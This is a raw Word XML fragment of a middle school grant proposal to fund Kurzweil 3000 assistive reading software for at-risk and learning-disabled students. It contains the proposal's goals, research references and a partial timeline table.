        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Orchard Middle School has 484 students, of which 59 have been determined to be at risk in their reading performance for a variety of reasons including learning disabilities, such as attention deficit disorder (ADD) and dyslexia, or other economic and language-based difficulties. Orchard Middle School is eligible for Title 1 funds and if these students are not given an opportunity to improve their reading skills they are, as studies show, more likely to be truant and drop out of school.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="373"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">The Orchard Read to Succeed! project will enable at risk students to improve their reading skills through utilization of five computers equipped with scanners and assistive reading software. Students using this innovative reading system will be able to utilize all their classroom materials, including textbooks providing them access to the general curriculum. The students will increase their reading speed and comprehension, which will help them obtain classroom subject proficiency. Included in the Read to Succeed! project will be a day of training for the reading specialist and classroom teachers on the features and use of the Kurzweil 3000 software. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Kurzweil Assistive Reading Technology </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Kurzweil 3000 software, from Kurzweil 3000 Educational Systems, uses a multi-sensory approach to help students with learning and reading difficulties. The Kurzweil 3000 was developed for people with reading difficulties caused by learning disabilities, such as dyslexia, attention deficit disorder (ADD) and other language based difficulties. The Kurzweil 3000 is research-based assistive reading software developed with guidance from leading reading experts. It enables all children access to state and national curricula and conforms to today’s research focused funding requirements. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">With the Kurzweil 3000, a student with reading difficulties has access to textbooks and classroom materials displayed as an exact image on the computer screen. The text is then read aloud using the highest quality, most human sounding synthetic speech while highlighting words and sentences visually on screen.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">One of the benefits of using assistive reading technology, such as the Kurzweil 3000, is that students are able access classroom textbooks for increased access to general curriculum materials. This means they can use the same materials used in the classroom and the students are able to continue learning in the least restrictive environment. In addition to reading tools, Kurzweil 3000 includes audible tools to assist word decoding (syllabification and spelling), tools to assist with writing (spell-checking and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">word-prediction), and a tool that speaks and highlights pages from the Internet, opening up a whole world of knowledge. The Kurzweil 3000 can also be used for classroom and standardized test-taking, offering more independence for both the student and teacher. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080" w:right="51" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Assistive reading technology has been shown (e.g., Heckler, L., Burns, L., Katz, L., Elkind, J., and Elkind, K. 2016 ; Elkind 2014) to help poor readers increase reading speed and comprehension, as well as increase attention. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">References  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="9"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Heckler, L., Burns, L., Katz, L., Elkind, J., and Elkind, K. 2016 Benefits of Assistive Reading </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Software for Students with Attention Disorders. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:i/>
          <w:vanish/>
        </w:rPr>
        <w:t>Annals of Dyslexia</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">, To Appear December 2016 Volume 52 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="1" w:line="238" w:lineRule="auto"/>
        <w:ind w:left="1075" w:right="49"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Elkind, J. 2014. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:i/>
          <w:vanish/>
        </w:rPr>
        <w:t>A Study of the Efficacy of the Kurzweil 3000 Reading Machine in Enhancing Poor Reading Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">. Portola Valley, CA: Lexia Institute </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Wise, B. and Olson, R. 2015 Computer-based Phonological Awareness and Reading Instruction. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:i/>
          <w:vanish/>
        </w:rPr>
        <w:t>Annals of Dyslexia</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> 45:99-122 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Elkind, J., Cohen K., and Murray, C. 2015 Using Computer-based Readers to Improve Reading Comprehension of Students with Dyslexia. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:i/>
          <w:vanish/>
        </w:rPr>
        <w:t>Annals of Dyslexia</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">, 46:159-186 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Olson, R. and Wise, B. 2014. Reading on the Computer with Orthographic and Speech Feedback. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:i/>
          <w:vanish/>
        </w:rPr>
        <w:t>Reading and Writing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> 4:107-44 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Olson R., Foltz G., and Wise, B. 1987 Reading Instruction and Remediation with the Aid of Computer Speech. In D. Reinking (ed.) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:i/>
          <w:vanish/>
        </w:rPr>
        <w:t>Computers and Reading: Issues for Theory and Practice</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">, New York: Teachers College Press, Columbia University. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Goals &amp; Objectives </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">The goal of the Read to Succeed! Project is to enable at risk students and students with learning and reading disabilities to improve their reading skills to the point where they can succeed in school and develop the reading skills that will prepare them for high school and post-secondary education. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Studies have shown that poor readers, who are reading at a grade level or more behind, are more likely to be disruptive in the classroom, truant from school, and at risk of dropping out of high school. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">The main objectives include: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="51" w:hanging="360"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Providing a measurable increase in reading speed, comprehension, and reading attention span. The objective is that the students will double their reading speed and increase their reading skills by one to two grade levels by the end of the school year. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="51" w:hanging="360"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Enabling poor readers to access the general curriculum through the use of assistive reading technology to scan and read their textbooks and other classroom materials. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="51" w:hanging="360"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Providing learning disabled students with a multi-sensory reading alternative that will help them increase their reading speed to the point they can read on their own.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00CA58E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="373"/>
        <w:ind w:right="51" w:hanging="360"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Helping learning and reading disabled students stay in their regular classroom with their peers, so they can continue learning in a least restrictive environment. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Timeline </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:jc w:val="right"/>
        <w:tblCellMar>
          <w:left w:w="107" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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b/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Activities </w:t>
            </w:r>
          </w:p>
        </w:tc>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 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="461"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Submit Grant Proposal </w:t>
            </w:r>
          </w:p>
        </w:tc>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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">October, 2016 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Expected Grant Notification </w:t>
            </w:r>
          </w:p>
        </w:tc>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2" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">December, 2016 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Obtain Hardware and Software </w:t>
            </w:r>
          </w:p>
        </w:tc>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January, 2017 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="461"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Set up Kurzweil </w:t>
            </w:r>
          </w:p>
        </w:tc>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January, 2017 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidTr="00270933">
        <w:trPr>
          <w:trHeight w:val="460"/>
          <w:jc w:val="right"/>
          <w:hidden/>
        </w:trPr>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Training Session for Teachers </w:t>
            </w:r>
          </w:p>
        </w:tc>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0" w:firstLine="0"/>
              <w:rPr>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F72BE7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">February, 2017 </w:t>
            </w:r>
          </w:p>
        </w:tc>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vanish/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
